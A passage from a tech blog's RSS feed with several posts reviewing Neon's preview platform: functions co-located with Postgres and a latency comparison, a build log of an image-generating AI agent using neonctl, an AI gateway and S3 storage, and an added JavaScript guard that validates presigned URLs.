</code></pre><p>Same query, same database. The only thing that changed is where the caller sits.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Median time for one SELECT 1 round trip&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;Median of 30 round trips to the same Neon Postgres (us-east-2), warm connection. 'From the function' runs inside Neon Functions, co-located with the branch. 'From Europe' is a machine on another continent. Your own gap depends on where your compute runs, but distance is latency.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;From the function (us-east-2)&quot;,&quot;value&quot;:1.19},{&quot;label&quot;:&quot;From Europe&quot;,&quot;value&quot;:134.54}]}"></div><p>About 113x. And that is for one round trip. A request that reads a session, loads a user, fetches their settings, and runs three more queries pays that distance once per query if it runs them in sequence. At 1.2 ms the six-query endpoint spends roughly 7 ms talking to the database; at 135 ms it spends most of a second, and no amount of application tuning fixes it, because the time is in the network. This is the tax co-located compute removes. It is also where a lot of &quot;serverless Postgres is slow&quot; folklore actually comes from: not the database, but a function in one region reconnecting to a database in another on every cold start.</p>
<p>To be fair about the comparison: a real deployment is rarely as far away as Europe-to-Virginia. If your Lambda and your database are both in <code>us-east-1</code> the gap is smaller. But &quot;both in the same region&quot; is exactly the property Neon Functions give you by default instead of by careful configuration, and &quot;smaller&quot; is not &quot;zero.&quot;</p>
<h2 id="h2-what-it-is-and-what-it-is-not" class="group relative scroll-mt-24">
        <a href="#h2-what-it-is-and-what-it-is-not" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What it is, and what it is not
        </a>
        </h2><p>A few things are worth stating plainly before you build around this, because it is a private preview and it has clear edges.</p>
<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><strong>Private preview, one region, new projects only.</strong> Everything is in AWS <code>us-east-2</code> and only works on projects created inside the preview. You cannot turn this on for an existing production database today.</p>
</div></div></div><p>Beyond that:</p>
<ul>
<li><strong>These are request/response functions, not a job runner.</strong> They are built for APIs, agents, webhooks, and real-time connections (they support streaming and long-lived sockets, not just quick replies). Background work, queues, retries, and schedules are a different kind of compute; pair them with something like Inngest or QStash.</li>
<li><strong>Function memory is fixed</strong> (2048 MiB at preview), so this is not yet a knob-for-everything compute platform.</li>
<li><strong>It is a Neon-shaped commitment.</strong> One config file declaring your functions is convenient precisely because it is integrated. That is coupling, traded for the locality and the branching.</li>
</ul>
<h2 id="h2-who-this-is-for" class="group relative scroll-mt-24">
        <a href="#h2-who-this-is-for" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who this is for
        </a>
        </h2><p>If your backend already lives in mature infrastructure-as-code with compute and database carefully placed in the same region, Neon Functions are not solving a problem you have. You already paid the cost to make the hop short.</p>
<p>The teams this helps are the ones who never got around to that: side projects and small teams whose compute and database drifted into different regions because nobody decided otherwise, and anyone who wants a pull request to spin up a genuinely isolated backend without wiring it by hand. For them, &quot;the function runs next to the database, on this branch&#39;s data, at this URL&quot; is a real reduction in both latency and moving parts, and it is the default rather than a configuration you have to get right.</p>
<p>We dig into the bigger picture in <a href="https://devops-daily.com/posts/neon-backend-platform-not-just-postgres">Neon is becoming a backend platform, not just Postgres</a>, and the rest of this series walks through the other things a branch-scoped function unlocks: streaming agents, MCP servers, and preview environments that include the backend. The full demo, including the <code>/db-latency</code> endpoint, is here:</p>
<div class="post-github not-prose" data-repo="The-DevOps-Daily/neon-functions-demo"></div>]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[I Gave an AI Agent a Database, Compute, Storage, and Models From One CLI]]></title>
      <link>https://devops-daily.com/posts/ai-agent-stack-one-cli-neon-platform</link>
      <description><![CDATA[An AI agent usually needs four accounts: a database, somewhere to run, object storage, and a model provider. I wired all four from a single Neon credential and had a deployed image-generating agent in a few minutes. Here is the actual build log, the config that ties it together, and the honest caveats.]]></description>
      <pubDate>Fri, 26 Jun 2026 13:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/ai-agent-stack-one-cli-neon-platform</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[ai-agents]]></category><category><![CDATA[serverless]]></category><category><![CDATA[postgres]]></category><category><![CDATA[platform-engineering]]></category>
      <content:encoded><![CDATA[<p>A working AI agent has an unglamorous shopping list. It needs a database to remember things, somewhere to run that can stream tokens without timing out, object storage for whatever it produces, and access to a model. Assembled the usual way, that is four separate signups: a Postgres host, a compute platform, an S3 bucket, and an OpenAI or Anthropic account, each with its own credential to provision, inject, and rotate per environment.</p>
<p>Neon&#39;s June 2026 platform preview collapses that list. The pitch is that the database, the compute, the storage, and the model gateway all come from one account and branch together. I wanted to know if that was real or a slide, so I built the canonical example end to end: an image-generating agent that takes a prompt, calls a model, stores the result, and indexes it in Postgres. This is the build log, with the real commands and output, and the parts where the preview still shows.</p>
<p>(Companion repo: <a href="https://github.com/The-DevOps-Daily/neon-ai-agent">The-DevOps-Daily/neon-ai-agent</a>. Everything below ran against a fresh project created while writing.)</p>
<h2 id="h2-one-command-to-scaffold-the-whole-stack" class="group relative scroll-mt-24">
        <a href="#h2-one-command-to-scaffold-the-whole-stack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          One command to scaffold the whole stack
        </a>
        </h2><p>Neon ships starter templates through its CLI. The image agent is one of them:</p>
<pre><code class="hljs language-bash">neonctl bootstrap ./ai-agent --template ai-sdk
</code></pre><p>That scaffolds 26 files: a Hono function, a Drizzle schema, a <code>neon.ts</code> config, and (a nice touch) a <code>.agents/skills/</code> directory with skill docs for the AI assistant you are probably using to edit the project. Neon bundles agent instructions for its own products, which tells you who this template is aimed at.</p>
<p>The file that matters is <code>neon.ts</code>. It is the entire backend declared in one object:</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">import</span> { defineConfig } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@neondatabase/config/v1&#x27;</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-title function_">defineConfig</span>({
  <span class="hljs-attr">preview</span>: {
    <span class="hljs-attr">aiGateway</span>: <span class="hljs-literal">true</span>,
    <span class="hljs-attr">buckets</span>: {
      <span class="hljs-attr">images</span>: {},
    },
    <span class="hljs-attr">functions</span>: {
      <span class="hljs-attr">imagegen</span>: {
        <span class="hljs-attr">name</span>: <span class="hljs-string">&#x27;AI SDK image agent&#x27;</span>,
        <span class="hljs-attr">source</span>: <span class="hljs-string">&#x27;src/index.ts&#x27;</span>,
      },
    },
  },
});
</code></pre><p>Three lines of intent: turn on the AI gateway, give me a bucket called <code>images</code>, and deploy <code>src/index.ts</code> as a function. No connection strings, no bucket ARNs, no model API keys. Those get filled in later, automatically.</p>
<h2 id="h2-linking-creates-the-project-deploying-creates-everything-else" class="group relative scroll-mt-24">
        <a href="#h2-linking-creates-the-project-deploying-creates-everything-else" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Linking creates the project, deploying creates everything else
        </a>
        </h2><p><code>neon link</code> creates and attaches a Neon project. The new platform features are private preview, so there are two constraints worth stating up front: everything is in AWS <code>us-east-2</code>, and it only works on projects created inside the preview. Your existing Neon databases do not grow these features in place.</p>
<p>Then <code>neon deploy</code> reads <code>neon.ts</code> and provisions the declared services. Here is the whole sequence, link through deploy:</p>
<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;link + deploy&quot;,&quot;steps&quot;:[{&quot;comment&quot;:&quot;create the project (us-east-2, preview only)&quot;},{&quot;cmd&quot;:&quot;neonctl link --project-name ai-agent --region-id aws-us-east-2&quot;,&quot;output&quot;:&quot;Created project (\&quot;ai-agent\&quot;) in aws-us-east-2 and linked .neon on branch main&quot;},{&quot;comment&quot;:&quot;read neon.ts and provision everything it declares&quot;},{&quot;cmd&quot;:&quot;neonctl deploy&quot;,&quot;output&quot;:&quot;Applied changes\n  create  service  bucket:images\n  create  service  function:imagegen\n\nFunction URLs\n  imagegen: https://br-green-star-...-imagegen.compute.c-3.us-east-2.aws.neon.tech/\n\nUtilized services: Postgres, Object Storage, Functions, AI Gateway\nPulled 11 Neon variables into .env.local&quot;}]}"></div><p>That last line is the actual product. Eleven environment variables (the <code>DATABASE_URL</code>, the S3 access key/secret/endpoint, and the AI gateway token and base URL) all written for me, all scoped to this branch. The four credentials I would normally collect from four dashboards arrived from one <code>deploy</code>.</p>
<h2 id="h2-the-model-call-one-credential-any-provider" class="group relative scroll-mt-24">
        <a href="#h2-the-model-call-one-credential-any-provider" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The model call: one credential, any provider
        </a>
        </h2><p>The AI Gateway is OpenAI-compatible. Your existing SDK works by changing only the base URL, so the same chat completion against the cheapest catalog model looks like this in whatever you already use:</p>
<div class="post-tabs not-prose" data-tabs="{&quot;title&quot;:&quot;Same gateway call, three SDKs (only the base URL changes)&quot;,&quot;tabs&quot;:[{&quot;label&quot;:&quot;curl&quot;,&quot;lang&quot;:&quot;bash&quot;,&quot;code&quot;:&quot;curl \&quot;$NEON_AI_GATEWAY_BASE_URL/ai-gateway/mlflow/v1/chat/completions\&quot; \\\n  -H \&quot;Authorization: Bearer $NEON_AI_GATEWAY_TOKEN\&quot; \\\n  -d '{\&quot;model\&quot;:\&quot;gpt-5-nano\&quot;,\&quot;messages\&quot;:[\n        {\&quot;role\&quot;:\&quot;user\&quot;,\&quot;content\&quot;:\&quot;What is Neon branching?\&quot;}]}'&quot;},{&quot;label&quot;:&quot;Python&quot;,&quot;lang&quot;:&quot;python&quot;,&quot;code&quot;:&quot;from openai import OpenAI\n\nclient = OpenAI(base_url=GATEWAY_URL, api_key=GATEWAY_TOKEN)\nclient.chat.completions.create(\n    model=\&quot;gpt-5-nano\&quot;,\n    messages=[{\&quot;role\&quot;: \&quot;user\&quot;, \&quot;content\&quot;: \&quot;What is Neon branching?\&quot;}],\n)&quot;},{&quot;label&quot;:&quot;Node&quot;,&quot;lang&quot;:&quot;javascript&quot;,&quot;code&quot;:&quot;import OpenAI from 'openai';\n\nconst client = new OpenAI({ baseURL: GATEWAY_URL, apiKey: GATEWAY_TOKEN });\nawait client.chat.completions.create({\n  model: 'gpt-5-nano',\n  messages: [{ role: 'user', content: 'What is Neon branching?' }],\n});&quot;}]}"></div><p>Hitting it once returns exactly what you would expect from the model:</p>
<pre><code class="hljs language-json"><span class="hljs-punctuation">{</span>
  <span class="hljs-attr">&quot;model&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;gpt-5-nano-2025-08-07&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;choices&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><span class="hljs-punctuation">{</span> <span class="hljs-attr">&quot;message&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span> <span class="hljs-attr">&quot;role&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;assistant&quot;</span><span class="hljs-punctuation">,</span>
    <span class="hljs-attr">&quot;content&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;Neon Postgres branching creates lightweight, independent
      clones of a running database that can be developed in isolation...&quot;</span> <span class="hljs-punctuation">}</span><span class="hljs-punctuation">}</span><span class="hljs-punctuation">]</span>
<span class="hljs-punctuation">}</span>
</code></pre><p>The same token reaches around 25 models across Anthropic, OpenAI, Google, and a few open-source providers. You move between them by changing one <code>model</code> string. There is no separate OpenAI or Anthropic account in this project. The published prices look like each provider&#39;s own list rate, so the gateway reads as pass-through with the convenience of a single credential:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Output price per 1M tokens, a few AI Gateway models&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;List prices from the Neon AI Gateway catalog (models.dev), June 2026. One endpoint and one credential reach all of them; you change a single model field to move across this range.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;gpt-5-nano&quot;,&quot;value&quot;:0.4},{&quot;label&quot;:&quot;gemini-2.5-flash&quot;,&quot;value&quot;:2.5},{&quot;label&quot;:&quot;claude-haiku-4.5&quot;,&quot;value&quot;:5},{&quot;label&quot;:&quot;claude-opus-4.5&quot;,&quot;value&quot;:25}]}"></div><p>The point is not the specific numbers, it is that &quot;use a cheap model in CI and a frontier model in prod&quot; becomes a config value rather than a second vendor integration.</p>
<h2 id="h2-storage-that-the-function-can-reach-with-the-normal-s3-sdk" class="group relative scroll-mt-24">
        <a href="#h2-storage-that-the-function-can-reach-with-the-normal-s3-sdk" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Storage that the function can reach with the normal S3 SDK
        </a>
        </h2><p>The <code>images</code> bucket is plain S3 as far as your code is concerned. The injected <code>AWS_*</code> variables point the standard AWS SDK at a branch-scoped endpoint, so this just works inside the function with no custom client:</p>
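<pre><code class="hljs language-ts"><span class="hljs-keyword">import</span> { S3Client, PutObjectCommand, GetObjectCommand } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@aws-sdk/client-s3&#x27;</span>;
<span class="hljs-keyword">import</span> { getSignedUrl } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@aws-sdk/s3-request-presigner&#x27;</span>;
<span class="hljs-comment">// Endpoint and credentials come from the injected AWS_* variables; path-style keeps the bucket in the URL path.</span>
<span class="hljs-keyword">const</span> s3 = <span class="hljs-keyword">new</span> <span class="hljs-title function_">S3Client</span>({ <span class="hljs-attr">forcePathStyle</span>: <span class="hljs-literal">true</span> });
<span class="hljs-comment">// key (the object key) and jpeg (the image bytes) are set earlier in the handler.</span>
<span class="hljs-keyword">await</span> s3.<span class="hljs-title function_">send</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">PutObjectCommand</span>({
  <span class="hljs-title class_">Bucket</span>: <span class="hljs-string">&#x27;images&#x27;</span>, <span class="hljs-title class_">Key</span>: key, <span class="hljs-title class_">Body</span>: jpeg, <span class="hljs-title class_">ContentType</span>: <span class="hljs-string">&#x27;image/jpeg&#x27;</span>,
}));
<span class="hljs-comment">// No expiresIn is passed, so the presigner&#x27;s default lifetime applies to this URL.</span>
<span class="hljs-keyword">const</span> url = <span class="hljs-keyword">await</span> <span class="hljs-title function_">getSignedUrl</span>(s3, <span class="hljs-keyword">new</span> <span class="hljs-title class_">GetObjectCommand</span>({ <span class="hljs-title class_">Bucket</span>: <span class="hljs-string">&#x27;images&#x27;</span>, <span class="hljs-title class_">Key</span>: key }));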
</code></pre><p>I confirmed it directly: a <code>PutObject</code> then <code>GetObject</code> round-tripped, and the presigned URL came back on a host scoped to the branch (<code>br-green-star-….storage.c-3.us-east-2.aws.neon.tech</code>). That branch scoping is the part you cannot get by bolting an external S3 bucket onto a database: open a branch and its files fork with it, so a preview environment never writes into production&#39;s objects.</p>
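<p>An added example, not from the original post or the companion repo: a guard a handler could run on a presigned URL before returning it, checking that it sits on the branch's storage host, addresses the <code>images</code> bucket path-style under the <code>generated/</code> prefix, and expires within a bound. The host name, the 15-minute cap, the function names, and the sample URL are constructed assumptions, and it assumes the endpoint emits the standard SigV4 query parameters <code>X-Amz-Date</code>, <code>X-Amz-Expires</code>, and <code>X-Amz-Signature</code>.</p>

```javascript
// Added example. The policy values and the sample URL are constructed.
const POLICY = {
  // Placeholder: use the branch storage host printed by your own deploy.
  allowedHost: 'br-example-branch.storage.example.invalid',
  bucket: 'images',         // bucket declared in neon.ts
  keyPrefix: 'generated/',  // prefix seen in the bucket_key column
  maxExpiresSeconds: 900,   // assumed cap: 15 minutes
};

// Parse the SigV4 timestamp format YYYYMMDD'T'HHMMSS'Z' into epoch milliseconds.
function parseAmzDate(value) {
  const m = /^(\d{4})(\d{2})(\d{2})T(\d{2})(\d{2})(\d{2})Z$/.exec(value || '');
  if (!m) return NaN;
  const [y, mo, d, h, mi, s] = m.slice(1).map(Number);
  return Date.UTC(y, mo - 1, d, h, mi, s);
}

// Return a list of policy violations; an empty list means the URL may be handed out.
function checkPresignedUrl(rawUrl, policy, nowMs) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch {
    return ['not a parseable URL'];
  }
  const problems = [];
  if (url.protocol !== 'https:') problems.push('scheme is not https');
  if (url.hostname !== policy.allowedHost) {
    problems.push('host is not the branch storage host');
  }

  // With forcePathStyle the bucket is the first path segment, the key is the rest.
  const [, bucket, ...rest] = url.pathname.split('/');
  const key = rest.join('/');
  if (bucket !== policy.bucket) problems.push('unexpected bucket');
  if (!key.startsWith(policy.keyPrefix) || key.length === policy.keyPrefix.length) {
    problems.push('key is outside the allowed prefix');
  }

  if (!url.searchParams.get('X-Amz-Signature')) problems.push('URL is not signed');

  // Number(null) is 0, so validate the raw string before converting.
  const rawExpires = url.searchParams.get('X-Amz-Expires') || '';
  const expires = /^\d+$/.test(rawExpires) ? Number(rawExpires) : NaN;
  const signedAt = parseAmzDate(url.searchParams.get('X-Amz-Date'));
  if (Number.isNaN(expires)) {
    problems.push('missing or malformed X-Amz-Expires');
  } else if (expires > policy.maxExpiresSeconds) {
    problems.push('lifetime exceeds cap');
  }
  if (Number.isNaN(signedAt)) {
    problems.push('missing or malformed X-Amz-Date');
  } else if (!Number.isNaN(expires) && signedAt + expires * 1000 <= nowMs) {
    problems.push('already expired');
  }
  return problems;
}

// Constructed sample: signed at 17:00:00 UTC, checked five minutes later.
const SAMPLE_URL =
  'https://br-example-branch.storage.example.invalid/images/generated/sample.jpg' +
  '?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20260702T170000Z' +
  '&X-Amz-Expires=900&X-Amz-SignedHeaders=host&X-Amz-Signature=00ff';
const SAMPLE_NOW = Date.UTC(2026, 6, 2, 17, 5, 0);

console.log(checkPresignedUrl(SAMPLE_URL, POLICY, SAMPLE_NOW));
```

<p>Run it on the value returned by <code>getSignedUrl</code> and refuse to return the URL when the list is non-empty.</p>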
<h2 id="h2-putting-it-together-the-agent-runs" class="group relative scroll-mt-24">
        <a href="#h2-putting-it-together-the-agent-runs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Putting it together: the agent runs
        </a>
        </h2><p>The function is a small handler. It streams a model response, and when the model calls its image-generation tool, it uploads the JPEG to the bucket, inserts a row in Postgres, and returns a presigned URL. Calling the deployed agent:</p>
<pre><code class="hljs language-bash">curl -X POST <span class="hljs-string">&quot;<span class="hljs-variable">$IMAGEGEN_URL</span>&quot;</span> -H <span class="hljs-string">&#x27;content-type: application/json&#x27;</span> \
  -d <span class="hljs-string">&#x27;{&quot;messages&quot;:[{&quot;role&quot;:&quot;user&quot;,
       &quot;content&quot;:&quot;Draw a small minimalist server rack icon, flat style&quot;}]}&#x27;</span>
</code></pre><p>The response streams back as the agent narrates and draws, and afterward the side effects are all there. The object is in the bucket, and the row is in Postgres pointing at it:</p>
<pre><code> id |              prompt               |             bucket_key              | bytes
----+-----------------------------------+-------------------------------------+-------
  2 | Draw a small minimalist server... | generated/ed49b102-…-f8c46e2f8c16.jpg | 47372
  1 | Draw a small minimalist server... | generated/9125d5b4-…-63b54a892695.jpg | 47372
</code></pre><p>From an empty directory to a deployed agent that generates an image, stores it, and indexes it in Postgres took a few minutes and exactly one credential. The model call, the file write, and the database insert were all wired by the platform, not by me.</p>
<h2 id="h2-where-it-still-shows-the-preview" class="group relative scroll-mt-24">
        <a href="#h2-where-it-still-shows-the-preview" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where it still shows the preview
        </a>
        </h2><p>The build was smooth, but it is private preview and a few seams are worth knowing before you plan around it.</p>
<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><strong>One region, new projects only.</strong> Everything is in AWS <code>us-east-2</code> and only works on projects created inside the preview. You cannot bolt these features onto an existing production database today.</p>
</div></div></div><ul>
<li><strong>Functions are request/response, not a job runner.</strong> Great for the agent&#39;s synchronous loop and streaming; background work (queues, retries, schedules) still belongs to something like Inngest or QStash.</li>
<li><strong>Two gateway dialects, and it matters.</strong> The <code>OPENAI_BASE_URL</code> Neon injects points at the OpenAI <em>Responses</em> API route. A plain chat-completions call needs the <code>mlflow</code> dialect route instead. I hit a <code>404</code> until I switched routes. The SKILL docs the template ships actually explain this, which is the kind of detail that saves you ten minutes if you read it first.</li>
<li><strong>Billing is half-public.</strong> Per-model token prices are listed, but whether there is a markup or preview credits on top is not spelled out. Fine for a demo, a question to ask before a budget.</li>
<li><strong>The convenience is also coupling.</strong> One config file declaring your functions, buckets, and gateway is, by design, Neon-shaped. The S3-compatible API and standard SDKs keep the exit ramps wide, but this is a bet on one vendor for four things you used to buy separately.</li>
</ul>
<h2 id="h2-so-is-it-real" class="group relative scroll-mt-24">
        <a href="#h2-so-is-it-real" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          So is it real?
        </a>
        </h2><p>Yes, with an asterisk for &quot;preview.&quot; The genuinely useful part is not any single feature, it is that the four pieces an agent needs arrive together, branch together, and authenticate with one credential. If you have ever spent the first afternoon of an AI side project wiring a database to a compute host to an S3 bucket to a model provider, collapsing that into one <code>neon.ts</code> and one <code>deploy</code> is a real reduction in moving parts.</p>
<p>Whether you should build on it today depends on your appetite for a private preview and for vendor consolidation. But as a statement of direction, an agent stack from one CLI is a clear one. We dig into the strategy behind it in <a href="https://devops-daily.com/posts/neon-backend-platform-not-just-postgres">Neon is becoming a backend platform, not just Postgres</a>, and we benchmark Neon&#39;s database side in the <a href="https://devops-daily.com/posts/neon-vs-supabase-free-tier-benchmarks">Neon vs Supabase series</a>. As these features leave preview, we will keep testing them the same way: real projects, real output, and the demo code published so you can run it yourself.</p>
<p>The full project is on GitHub. Clone it, point <code>neonctl</code> at a new <code>us-east-2</code> project, and <code>deploy</code>:</p>
<div class="post-github not-prose" data-repo="The-DevOps-Daily/neon-ai-agent"></div>]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[Neon Is Becoming a Backend Platform, Not Just Postgres]]></title>
      <link>https://devops-daily.com/posts/neon-backend-platform-not-just-postgres</link>
      <description><![CDATA[In June 2026 Neon added serverless functions, S3-compatible object storage, and an AI gateway to its database. The interesting part is not any one feature, it is the through-line: everything branches with your data. Here is what shipped, what it competes with, and where the seams still show.]]></description>
      <pubDate>Fri, 26 Jun 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-backend-platform-not-just-postgres</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[postgres]]></category><category><![CDATA[serverless]]></category><category><![CDATA[platform-engineering]]></category><category><![CDATA[architecture]]></category>
      <content:encoded><![CDATA[<p>For most of its life, Neon had a one-sentence pitch: serverless Postgres that branches like Git. You got a database that scaled to zero, forked in milliseconds, and charged you for what you used. Everything else (your compute, your file storage, your AI calls, your auth) you wired up somewhere else and pointed at the connection string.</p>
<p>In June 2026 that sentence got longer. Neon shipped a private preview that adds three new surfaces around the database: serverless <strong>Functions</strong>, S3-compatible <strong>Storage</strong>, and an <strong>AI Gateway</strong> for model calls. A fourth, <strong>Neon Auth</strong>, shows up in the templates. None of these is novel on its own. Functions look like Lambda, storage looks like S3, an AI gateway looks like a dozen other AI gateways. The reason it is worth a closer look is the through-line connecting them, and that through-line is the same primitive Neon already built its name on: branching.</p>
<p>This is an analysis of what actually shipped, what it replaces, and where it is still clearly a preview. I created a new project and deployed against it while writing this, so the specifics below are from the real thing, not the marketing page.</p>
<h2 id="h2-what-shipped" class="group relative scroll-mt-24">
        <a href="#h2-what-shipped" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What shipped
        </a>
        </h2><p>Four pieces, all in private preview, all in AWS <code>us-east-2</code>, all for new projects only.</p>
<p><strong>Neon Functions</strong> are Node.js compute deployed onto a database branch. You declare them in a <code>neon.ts</code> config file, write a standard Fetch-API handler (Hono is the recommended framework), and run <code>neonctl deploy</code>. Each branch gets its own function URL, the <code>DATABASE_URL</code> is injected automatically, and the function runs in the same region as the branch, so there is no cross-region hop to the database. They support streaming and long-lived connections (WebSockets, server-sent events), which is the deliberate split from request-scoped serverless: these are not for background jobs, they are for request/response and real-time work.</p>
<p><strong>Neon Storage</strong> is S3-compatible object storage. Your existing AWS SDK, boto3, or <code>aws</code> CLI talk to it unchanged. The twist is that storage is scoped to a branch, so when you fork a database branch, its files fork with it.</p>
<p><strong>Neon AI Gateway</strong> is a single credential that fronts models from Anthropic, OpenAI, Google, and a few open-source providers. The OpenAI and Anthropic SDKs work without code changes; you point them at a per-branch gateway endpoint. The published catalog lists around 25 models, priced per million tokens at what look like each provider&#39;s own list rates (Claude Haiku 4.5 at $1/$5 in/out, GPT-5 Nano at $0.05/$0.40, Gemini 2.5 Flash at $0.30/$2.50).</p>
<p><strong>Neon Auth</strong> rounds it out with authentication that does not require standing up a separate identity service, used in the realtime-chat template alongside Next.js.</p>
<h2 id="h2-the-through-line-is-branching" class="group relative scroll-mt-24">
        <a href="#h2-the-through-line-is-branching" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The through-line is branching
        </a>
        </h2><p>Take those four features and the obvious read is &quot;Neon is cloning Supabase,&quot; or &quot;Neon is becoming Vercel with a database.&quot; Both are partly true and both miss the point. The organizing idea is that every one of these surfaces inherits database branching.</p>
<p>A Neon branch already gave you an isolated copy of your data in milliseconds, with copy-on-write so it was cheap. Now that same branch gives you:</p>
<ul>
<li>an isolated <strong>function</strong> at its own URL, running your latest code against that branch&#39;s data,</li>
<li>an isolated <strong>storage</strong> namespace, so files written in a preview branch never touch production objects,</li>
<li>an isolated <strong>AI Gateway</strong> endpoint, so model usage on a feature branch is its own thing.</li>
</ul>
<p>That is the part you cannot easily assemble from separate vendors. You can stitch Lambda, S3, an AI gateway, and an auth provider together yourself, plenty of teams have. What you cannot easily do is make all of them fork in lockstep when you open a pull request, and then throw the whole set away when the branch merges. The preview environment stops being &quot;a copy of the database plus a pile of shared, mutable infrastructure&quot; and becomes a genuinely isolated copy of the backend.</p>
<p>If you have ever had a preview deployment write a test file into the production S3 bucket, or seen a staging job run up a bill against the same AI key as prod, you already understand why branch-scoped everything is the actual feature here.</p>
<h2 id="h2-what-it-replaces-and-the-tax-it-removes" class="group relative scroll-mt-24">
        <a href="#h2-what-it-replaces-and-the-tax-it-removes" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What it replaces, and the tax it removes
        </a>
        </h2><p>The clearest way to see the value is to count the moving parts in a typical &quot;branchable AI app&quot; today versus on this platform. Standing up one environment the assemble-it-yourself way usually means a database, a compute host, an object store, a few model-provider keys, and an auth service, each with its own account, credential, and region to keep in sync.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Distinct services and credentials to wire up per environment&quot;,&quot;caption&quot;:&quot;Illustrative count for a branchable AI app, not a benchmark.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;Assemble it yourself&quot;,&quot;value&quot;:7},{&quot;label&quot;:&quot;Neon platform&quot;,&quot;value&quot;:1}]}"></div><p>That count is illustrative, not measured: your stack may have more or fewer pieces. But the direction is the real claim. Every separate service is another credential to rotate, another thing to provision per preview environment, and another place for prod and staging to accidentally share state. Collapsing that to one account with auto-injected, per-branch credentials is less a feature than the removal of a tax you have been quietly paying.</p>
<p>There is a second, quieter tax it removes: distance. Because functions run in the same region as the branch, the function-to-database round trip is local. A lot of &quot;serverless Postgres is slow&quot; folklore is really &quot;my Lambda in one region is talking to my database in another, over a connection it has to re-establish on every cold start.&quot; Co-locating the compute with the branch sidesteps that specific problem.</p>
<h2 id="h2-where-the-seams-still-show" class="group relative scroll-mt-24">
        <a href="#h2-where-the-seams-still-show" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where the seams still show
        </a>
        </h2><p>This is a private preview, and it reads like one. Worth being clear-eyed about the limits before you plan anything around it.</p>
